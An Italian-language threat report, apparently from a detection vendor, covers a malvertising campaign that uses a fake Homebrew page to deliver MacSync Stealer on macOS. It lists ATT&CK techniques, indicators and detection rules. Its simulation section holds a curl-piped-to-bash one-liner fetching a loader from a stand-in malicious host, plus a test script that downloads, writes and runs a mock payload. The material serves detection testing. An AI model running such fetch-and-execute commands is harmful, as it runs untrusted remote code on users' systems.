Segui 
Detection stack
- AIDR
- Alert
- ETL
- Query
Sommario
Gli aggressori stanno utilizzando annunci di ricerca dannosi per indirizzare gli utenti a un sito web falso di Homebrew che prende di mira i sistemi macOS con MacSync Stealer. La pagina contraffatta istruisce le vittime a copiare ed eseguire un comando shell che scarica e avvia il malware. Una volta attivo, lo stealer raccoglie credenziali e dettagli del sistema, comprime i dati rubati in un archivio ZIP e lo invia a un server di comando e controllo. La campagna evidenzia l’uso crescente del malvertising per compromettere gli utenti macOS.
Indagine
L’analista ha tracciato l’attacco dall’annuncio dannoso a una pagina di Homebrew impersonata ospitata su Google Sites. Quella pagina presentava un zsh comando che, una volta eseguito, scaricava script aggiuntivi da un’infrastruttura controllata dagli attaccanti e creava un archivio ZIP temporaneo contenente i dati raccolti. Il traffico di rete confermava che l’archivio era stato esfiltrato verso il dominio glowmedaesthetics.com. I ricercatori hanno documentato gli indicatori pertinenti, inclusi URL, domini e percorsi file legati alla catena di infezione.
Mitigazione
Gli utenti dovrebbero evitare di copiare e eseguire comandi da siti web non fidati e dovrebbero verificare la legittimità delle pagine del gestore pacchetti prima di interagirvi. Le estensioni del browser focalizzate sulla sicurezza o sul blocco degli annunci possono aiutare a ridurre l’esposizione a link sponsorizzati dannosi. Su macOS, Gatekeeper dovrebbe rimanere attivo e l’esecuzione delle applicazioni dovrebbe essere limitata a software affidabile e con firma digitale. I difensori dovrebbero anche monitorare il traffico in uscita per connessioni a domini non familiari.
Risposta
I team di sicurezza dovrebbero rilevare l’esecuzione del comando sospetto zsh e qualsiasi attività curl che raggiunge l’URL dannoso identificato. Dovrebbero anche essere generati allarmi per la creazione dell’archivio /tmp/osalogging.zip e per il traffico in uscita verso glowmedaesthetics.com. Se si sospetta un’infezione, isolare il sistema compromesso, raccogliere prove forensi e reimpostare qualsiasi credenziale compromessa.
"graph TB %% Class Definitions classDef technique fill:#99ccff %% Node definitions initial_malicious_link["<b>Technique</b> – <b>T1204.001 Malicious Link</b><br/><b>Description</b>: La vittima clicca su un URL dannoso in un annuncio ed è diretta a una pagina di download contraffatta di Homebrew."] class initial_malicious_link technique user_copy_paste["<b>Technique</b> – <b>T1204.004 Malicious Copy and Paste</b><br/><b>Description</b>: La vittima copia uno script elaborato dalla pagina web e lo incolla nel Terminale, eseguendo il codice dell’attaccante."] class user_copy_paste technique unix_shell["<b>Technique</b> – <b>T1059.004 Unix Shell</b><br/><b>Description</b>: Lo script Zsh si esegue, scaricando ulteriori payload da glowmedaesthetics.com."] class unix_shell technique gui_input_capture["<b>Technique</b> – <b>T1056.002 GUI Input Capture</b><br/><b>Description</b>: Una falsa richiesta grafica di password cattura la password dell’utente macOS."] class gui_input_capture technique local_data_staging["<b>Technique</b> – <b>T1074.001 Local Data Staging</b><br/><b>Description</b>: Le informazioni e i registri del sistema sono archiviati in /tmp/osalogging.zip per una successiva esfiltrazione."] class local_data_staging technique exfiltration_c2["<b>Technique</b> – <b>T1041 Exfiltration Over C2 Channel</b><br/><b>Description</b>: Il file zip è inviato al server C2 dell’attaccante tramite HTTPS."] class exfiltration_c2 technique gather_software_info["<b>Technique</b> – <b>T1592.002 Software</b><br/><b>Description</b>: Lo script enumera il software installato per creare un inventario del sistema vittima."] class gather_software_info technique data_local_system["<b>Technique</b> – <b>T1005 Data from Local System</b><br/><b>Description</b>: Legge file locali aggiuntivi da includere nell’archivio esfiltrato."] class data_local_system technique %% Connections initial_malicious_link –>|leads_to| user_copy_paste user_copy_paste –>|leads_to| unix_shell unix_shell –>|leads_to| gui_input_capture gui_input_capture –>|leads_to| local_data_staging local_data_staging –>|leads_to| exfiltration_c2 local_data_staging –>|also leads_to| gather_software_info local_data_staging –>|also leads_to| data_local_system "
Flusso di attacco
Rilevazioni
Possibile manipolazione di stringhe codificate Base64 [MacOS] (tramite cmdline)
Visualizza
Archivio creato nella cartella temporanea di macOS (tramite file_event)
Visualizza
IOC (HashSha256) per rilevare: Annuncio dannoso per Homebrew porta a MacSync Stealer
Visualizza
Rilevamento dell’installazione di MacSync Stealer tramite pagina di Homebrew falsa [Creazione processo Linux]
Visualizza
Esecuzione della simulazione
Prerequisito: Il Controllo Pre-volo di Telemetria e Baseline deve essere superato.
Ragionamento: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e il racconto DEVONO riflettere direttamente i TTP identificati e mirare a generare la telemetria esatta prevista dalla logica di rilevamento.
-
Narrazione dell’attacco e comandi:
-
Esca iniziale: La vittima riceve un’e-mail di phishing contenente un link a una pagina “tap” contraffatta di Homebrew che ospita uno script di installazione dannoso.
-
Esecuzione: La vittima copia la one‑liner dalla pagina e la incolla nel loro terminale:
curl -fsSL https://malicious.example.com/macsyncloader.sh | /bin/bash- The
curlil binario viene richiamato (corrisponde alla regola).
- The
-
Script di downloader (
macsyncloader.sh):- Scarica il payload di MacSync tramite
curl. - Scrive il payload su
/tmp/.macsynce lo esegue. - Fa comparire finestre di dialogo per il furto di credenziali (simulato tramite
osascriptsu macOS, ma qui semplicemente facciamo eco).
- Scarica il payload di MacSync tramite
-
Persistenza: Lo script registra un LaunchAgent per l’esecuzione al login (fuori dall’ambito della regola corrente ma rilevante per un rilevamento più ampio).
-
-
Script di test di regressione: Il seguente script Bash riproduce i passaggi esatti, garantendo che la telemetria sia allineata con la logica di rilevamento.
#!/usr/bin/env bash set -euo pipefail # ------------------------------------------------- # Simulated attacker-controlled script host # ------------------------------------------------- MALICIOUS_HOST="https://malicious.example.com" LOADER="${MALICIOUS_HOST}/macsyncloader.sh" # ------------------------------------------------- # Step 1: Download and execute the malicious loader # ------------------------------------------------- echo "[*] Attivazione della regola di rilevamento invocando curl ..." curl -fsSL "$LOADER" | /bin/bash # ------------------------------------------------- # Step 2: (Inside the loader) – Simulated payload # ------------------------------------------------- # Normalmente il loader verrebbe recuperato dall'host remoto. # Per scopo di questo test, includiamo il payload inline. cat <<'PAYLOAD' > /tmp/.macsync #!/usr/bin/env bash echo "Payload di MacSync eseguito – esfiltrando info dell'host..." # Simula il furto di credenziali (nessun dato reale) echo "Credenziali raccolte: user@example.com / password123" PAYLOAD chmod +x /tmp/.macsync /tmp/.macsync echo "[*] Simulazione completata." -
Comandi di pulizia: Rimuovi artefatti e termina eventuali processi residui.
#!/usr/bin/env bash set -euo pipefail echo "[*] Pulizia degli artefatti della simulazione ..." rm -f /tmp/.macsync # Nessun servizio persistente è stato creato in questo test echo "[*] Pulizia completata."